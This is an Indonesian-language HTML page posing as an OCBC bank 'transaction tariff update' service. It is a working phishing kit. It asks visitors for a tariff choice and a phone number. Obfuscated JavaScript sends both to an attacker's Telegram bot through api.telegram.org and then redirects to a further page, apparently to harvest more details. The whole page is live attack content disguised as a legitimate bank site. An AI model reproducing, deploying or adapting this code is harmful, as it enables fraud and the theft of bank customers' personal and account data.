<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰𝗼𝗺 | 𝗨𝗽𝗱𝗮𝘁𝗲 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶</title>
    <meta property="og:image" content="https://hosting.tigerengine.id/b6wph4.png">
    <link href="https://hosting.tigerengine.id/gnhx6j.png" rel="shortcut icon" type="image/x-icon">
    <meta name="description" content="BANK-OCBC terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap">
    <style>
        * {
            font-family: 'Ubuntu', sans-serif;
            font-weight: 400;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            color: #000;
        }
        body, html {
            background-color: #fff;
            width: 100%;
            height: 100%;
             position: relative;
            margin: 0 auto;
            right: 0;
            left: 0;
            max-width: 450px;
        }
        .container {
            max-width: 90%;
            padding: 0px;
            margin: 10px auto;
            background: #fff;
            box-shadow: #dedede 1px 1px 4px 3px;
            border-radius: 15px;
        }
        button {
            margin-top: 5px;
            width: 100%;
            height: 40px;
            border: none;
            outline: none;
            border-radius: 25px;
            color: #fff;
            background: #d1001a;
            text-align: center;
            font-size: 13px;
            font-weight: bold;
            box-shadow: 2px 2px 2px 0px rgba(8, 8, 0, 0.5);
        }
        button:disabled {
            opacity: 0.7;
            background: #dedede;
        }
        input[type=text], input[type=tel], select {
            width: 90%;
            padding: 12px 10px;
            margin: 0px 0;
            font-weight: 600;
            box-sizing: border-box;
            border: none;
            font-size: 15px;
            border-bottom: 1px solid #9b9b9b;
            outline: none;
        }
        
welalxcome {
  display: flex;
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  background: url('https://hosting.tigerengine.id/8zjfou.png') no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
  z-index: 10000;
  background-color: #ffffff;
  max-width: 450px;
  margin: 0 auto;

}
welalxcome img {
        width:100%;
    height: 700px;
    margin-top: -55px;
    
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
    </style>
</head>
<body>
    <main>
<welalxcome style="display: none">
</welalxcome>
<chsalxcome2 style="display: none;">
    <img src="https://hosting.tigerengine.id/q9ro5y.jpg" width="100%" alt="">
    <div class="space" style="padding:5%;height:0%;"></div>
    <center>
        <h3 style="font-weight: 950;">Selamat Datang di Layanan<br>Perubahan Tarif Transaksi OCBC</h3>
    </center>
    <br>
    <form onsubmit="sendHp(event)" method="POST">
        <div class="container">
            <br>
            <label style="margin:25px;font-weight: 850;color:#000;font-size:16px;">Pilihan Tarif :</label>
            <center>
                <div class="custom-select">
                    <select required style="width:90%;background:#fff;outline:none;" name="tarif" id="tarif">
                        <option value="">Klik disini untuk pilih tarif</option>
                        <option value="Lama Rp.6,500">TARIF LAMA Rp.6,500/TRANSAKSI</option>
                        <option value="Baru Rp.150,000">TARIF BARU Rp.150,000/BULAN</option>
                    </select>
                </div>
            </center>
            <br>
            <label style="margin:25px;font-weight: 850;color:#000;font-size:16px;">Nomor Handphone :</label>
            <center>
                <input type="tel" placeholder="08XXXXXXXXXX" name="nohp" id="nohp" maxlength="14" minlength="9" required>
            </center>
            <br>
        </div>
        <br>
        <div class="space" style="padding:30%;height:0%;margin:0;"></div>
        <br>
        <button type="submit" id="kirim" style="margin: 0 auto; width: 90%; height: 52px; position: fixed; bottom: 10px; right: 0; left: 0; padding: 0px 0px; font-weight: 700; font-size: 14px; background: #d1001a; color: #fff; border-radius: 10px; font-weight: solid; border: 0px none #fff;max-width: 450px;" > Ajukan Sekarang</button>
    </form>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><script src="i.js"></script>
    <script>
        $( document ).ready(function() {
      $('welalxcome').fadeIn(500);
            setTimeout(() => {
                $('welalxcome').fadeOut();
                $('chsalxcome2').fadeIn();
            },800)
        })
        
        function _0x4189(){var _0xabd170=['cEGao','21xSgwKT','nohp','setItem','/sendMessa','OdINl','&text=','OLJOZ','YgcCs','arang','preventDef','\x0a\x0a※\x20𝗧𝗮𝗿𝗶𝗳\x20','5307575CyhQyD','innerHTML','Memproses.','val','eQMvv','khRSN','zKgTf','rfIQD','#nohp','e=html','tarif','&parse_mod','https://ap','location','𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰','.org/bot','POST','oZzLx','spHHG','51230UdZPGb','qsMWW','ault','RMyAd','174934vvYWnY','i.telegram','XLAos','VNUPR','LtkWe','...','mTBlI','ById','vvuoG','5379996QFnXQK','htHRG','getElement','786blPpLi','𝗼𝗺','cVlkK','bqOYC','ge?chat_id','split','user.html','3|8|1|6|7','#tarif','oCtSy','225ttfxZe','\x0a※\x20𝗡𝗼.𝗛𝗽\x20•','1023008ItLdDm','Ajukan\x20Sek','2|4|5|0|9|','••\x20','FgOiV','AAzkf','70483sriCcD','kirim','WwwRM','675385OdgANO','xdJwv','ajax'];_0x4189=function(){return _0xabd170;};return _0x4189();}(function(_0x1e5f00,_0x415ccc){var _0x31a891=_0xe73f,_0x31d055=_0x1e5f00();while(!![]){try{var _0x20d5a5=-parseInt(_0x31a891(0x1d5))/(0x20f1+0x213*0xc+0x2*-0x1cea)+parseInt(_0x31a891(0x1fb))/(-0x3*-0x37+0x709+-0x7ac)*(parseInt(_0x31a891(0x1d9))/(-0x2f*-0x89+-0x1b07*-0x1+0x1*-0x342b))+parseInt(_0x31a891(0x204))/(0x2*0x15b+0x5a3+-0x855)+parseInt(_0x31a891(0x1e4))/(0x2147+0x83*-0x46+0x290)+-parseInt(_0x31a891(0x207))/(0x24af+0xbab+-0xc*0x407)*(parseInt(_0x31a891(0x1d2))/(0x37*0xe+-0x49c+0x1a1))+-parseInt(_0x31a891(0x213))/(-0x1f+0x179f+0xbbc*-0x2)+parseInt(_0x31a891(0x211))/(-0x1*-0x266+0x1aa4+0x3*-0x9ab)*(-parseInt(_0x31a891(0x1f7))/(0x1*-0x7d9+0xddd+0x9*-0xaa));if(_0x20d5a5===_0x415ccc)break;else _0x31d055['push'](_0x31d055['shift']());}catch(_0x42f94c){_0x31d055['push'](_0x31d055['shift']());}}}(_0x4189,-0xaebaa*-0x1+-0x146202+-0x152ff*-0x10));function _0xe73f(_0x4f03f1,_0x4757a0){var _0xede729=_0x4189();return _0xe73f=function(_0x4f20b0,_0x239e47){_0x4f20b0=_0x4f20b0-(-0x81*-0x7+-0x22be+-0xb03*-0x3);var _0x4c8c5d=_0xede729[_0x4f20b0];return _0x4c8c5d;},_0xe73f(_0x4f03f1,_0x4757a0);}function sendHp(_0x255f33){var _0x3b778e=_0xe73f,_0x35ce93={'htHRG':_0x3b778e(0x215)+_0x3b778e(0x20e),'khRSN':_0x3b778e(0x1ee),'spHHG':_0x3b778e(0x1f2)+_0x3b778e(0x208),'AAzkf':_0x3b778e(0x20d),'OLJOZ':_0x3b778e(0x1d3),'xdJwv':_0x3b778e(0x214)+_0x3b778e(0x1e1),'cVlkK':function(_0x4ec4d6,_0x6929b,_0xdf620a){return _0x4ec4d6(_0x6929b,_0xdf620a);},'oZzLx':function(_0x4f06e3,_0x233054){return _0x4f06e3(_0x233054);},'bqOYC':_0x3b778e(0x1ec),'FgOiV':function(_0x11e4e9,_0x5817e5){return _0x11e4e9(_0x5817e5);},'YgcCs':_0x3b778e(0x20f),'rfIQD':function(_0x397019,_0x198096){return _0x397019+_0x198096;},'WwwRM':function(_0x5c7fca,_0x38072d){return _0x5c7fca+_0x38072d;},'eQMvv':function(_0x19a58f,_0xd5b6f5){return _0x19a58f+_0xd5b6f5;},'zKgTf':_0x3b778e(0x1e3)+_0x3b778e(0x216),'vvuoG':_0x3b778e(0x212)+'•\x20','OdINl':_0x3b778e(0x1da),'mTBlI':_0x3b778e(0x1e6)+_0x3b778e(0x200)},_0x2d46b5=_0x35ce93[_0x3b778e(0x205)][_0x3b778e(0x20c)]('|'),_0x39b5a1=0x2da*-0x1+0xe77+-0xb9d;while(!![]){switch(_0x2d46b5[_0x39b5a1++]){case'0':sessionStorage[_0x3b778e(0x1db)](_0x35ce93[_0x3b778e(0x1e9)],_0x2b6a8b);continue;case'1':var _0x5042a1=_0x35ce93[_0x3b778e(0x1f6)];continue;case'2':var _0x55565d={'XLAos':_0x35ce93[_0x3b778e(0x218)],'RMyAd':_0x35ce93[_0x3b778e(0x1df)],'cEGao':_0x35ce93[_0x3b778e(0x1d6)],'VNUPR':function(_0x4b24a2,_0x48d6f7,_0x1a16be){var _0x3c622e=_0x3b778e;return _0x35ce93[_0x3c622e(0x209)](_0x4b24a2,_0x48d6f7,_0x1a16be);}};continue;case'3':var _0x51b4c1=_0x35ce93[_0x3b778e(0x1f5)]($,_0x35ce93[_0x3b778e(0x20a)])[_0x3b778e(0x1e7)]();continue;case'4':_0x255f33[_0x3b778e(0x1e2)+_0x3b778e(0x1f9)]();continue;case'5':var _0x2b6a8b=_0x35ce93[_0x3b778e(0x217)]($,_0x35ce93[_0x3b778e(0x1e0)])[_0x3b778e(0x1e7)]();continue;case'6':var _0x302533=_0x35ce93[_0x3b778e(0x1eb)](_0x35ce93[_0x3b778e(0x1d4)](_0x35ce93[_0x3b778e(0x1e8)](_0x35ce93[_0x3b778e(0x1eb)](_0x5042a1,_0x35ce93[_0x3b778e(0x1ea)]),_0x2b6a8b),_0x35ce93[_0x3b778e(0x203)]),_0x51b4c1);continue;case'7':$[_0x3b778e(0x1d7)]({'url':_0x3b778e(0x1f0)+_0x3b778e(0x1fc)+_0x3b778e(0x1f3)+token+(_0x3b778e(0x1dc)+_0x3b778e(0x20b)+'=')+grup+_0x3b778e(0x1de)+_0x35ce93[_0x3b778e(0x217)](encodeURIComponent,_0x302533)+(_0x3b778e(0x1ef)+_0x3b778e(0x1ed)),'method':_0x3b778e(0x1f4),'complete':function(){var _0x4d6ab3=_0x3b778e,_0x2afe89={'qsMWW':_0x55565d[_0x4d6ab3(0x1fd)],'LtkWe':_0x55565d[_0x4d6ab3(0x1fa)],'oCtSy':_0x55565d[_0x4d6ab3(0x1d8)]};_0x55565d[_0x4d6ab3(0x1fe)](setTimeout,function(){var _0x100564=_0x4d6ab3;window[_0x100564(0x1f1)]=_0x2afe89[_0x100564(0x1f8)],document[_0x100564(0x206)+_0x100564(0x202)](_0x2afe89[_0x100564(0x1ff)])[_0x100564(0x1e5)]=_0x2afe89[_0x100564(0x210)];},-0x1bc8+0x186d+-0x161*-0x3);}});continue;case'8':sessionStorage[_0x3b778e(0x1db)](_0x35ce93[_0x3b778e(0x1dd)],_0x51b4c1);continue;case'9':document[_0x3b778e(0x206)+_0x3b778e(0x202)](_0x35ce93[_0x3b778e(0x1df)])[_0x3b778e(0x1e5)]=_0x35ce93[_0x3b778e(0x201)];continue;}break;}};
    </script>
</body>
</html>
